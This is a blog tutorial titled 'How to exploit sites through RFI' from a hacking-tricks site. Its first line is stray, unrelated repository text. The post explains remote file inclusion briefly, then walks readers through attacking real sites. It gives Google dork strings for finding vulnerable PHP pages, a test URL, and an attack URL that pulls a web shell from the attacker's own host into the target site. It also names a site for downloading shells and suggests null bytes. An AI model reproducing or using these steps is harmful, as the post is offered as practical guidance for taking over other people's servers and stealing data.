... net.sf.xss-html-filter xss-html-filter 1.1 xss-html-filter releases xss-html-filter Releases Repository http://xss-html-filter.sf.net/releases/ Computer Hacks and tricks: How to exploit sites through RFI

Thursday, January 9, 2014

How to exploit sites through RFI

 In my previous tutorial I talked about Remote File Inclusion which  is a type of attack that targets the computers servers that run Web sites and their web applications. RFI exploits are most often attributed to the PHP programming language which is used in many large corporations that includes Facebook and Sugar CRM. However, RFI can manifest itself in other environments and was in fact introduced initially as SHTML injection. RFI works by exploiting web applications that dynamically reference external scripts indicated by user input without proper sanitation. As a consequence, the application can be instructed to include a script hosted on a remote server and thus execute code controlled by an attacker. The executed scripts can be used for temporary data theft or manipulation, or for a long term takeover of the vulnerable server.
This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to: 
§   Code execution on the web server
§   Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS).
§   Denial of Service (DoS)
§   Data Theft/Manipulation
RFI is a very uncommon vulnerability due to excessive patches and updates on websites.
So lets start with the tutorial, but before reading to this tutorial, read Disclaimer first………
the first step would to find a site that is vulnerable to remote file inclusion.
For this You will have to use google dorks. Some of the dorks are like this
inurl:/template.php?pagina=
    inurl:/index.php?pagina=
    inurl:/index.php?inc=
    inurl:/includes/include_onde.php?include_file=
    inurl:/index.php?page=
    inurl:/index.php?pg=
    inurl:/index.php?show=
    inurl:/index.php?cat=
    inurl:/index.php?file=
    inurl:/db.php?path_local=
    inurl:/index.php?site=
    inurl:/htmltonuke.php?filnavn=

Know you would find the exploit
After getting the website list in Google search, we will have to test the Vulnerability of a website. In order to understand better I will be giving u an example
Let us suppose we have a vulnerable website say

 
www.vulnerablesite.com

Now you have to add these keywords  into it

index.php?page=www.google.com

And it will become like this

www.vulnerablesite.com/index.php?page=http://www.google.com

 
Hit Enter, If the executed page will direct us to Google homepage, then we can say that the website is vulnerable to attack.

Know you would exploit the vulnerability
After this you would have to upload the shell to the target website. For this we have to take few things into consideration viz, the shell must be in .txt format (shell.txt) like Locus. You can see the shell page and download shells from www.sh3ll.org  . Once we have the shell, we will have to upload it to and free hosting service and the shell page after uploading becomes like this
www.yourownwebsite.com/shell.txt
  
After this you would have to add the shell page to the vulnerable website. This can be done by adding these keywords to the vulnerable site 

www.vulnerablesite.com/v2/index.php?page=http://www.yourownsite.com/shell.txt

Sometimes you will have to use null bytes for it to execute in a successfully If we receive an error from shell.txt then for this we will have to try shell.txt
Please like subscribe and follow we are close to 10,000 views and when that occurs we are giving away free stuff and will be doing the same once we reach 100 subscribers.


1 comment: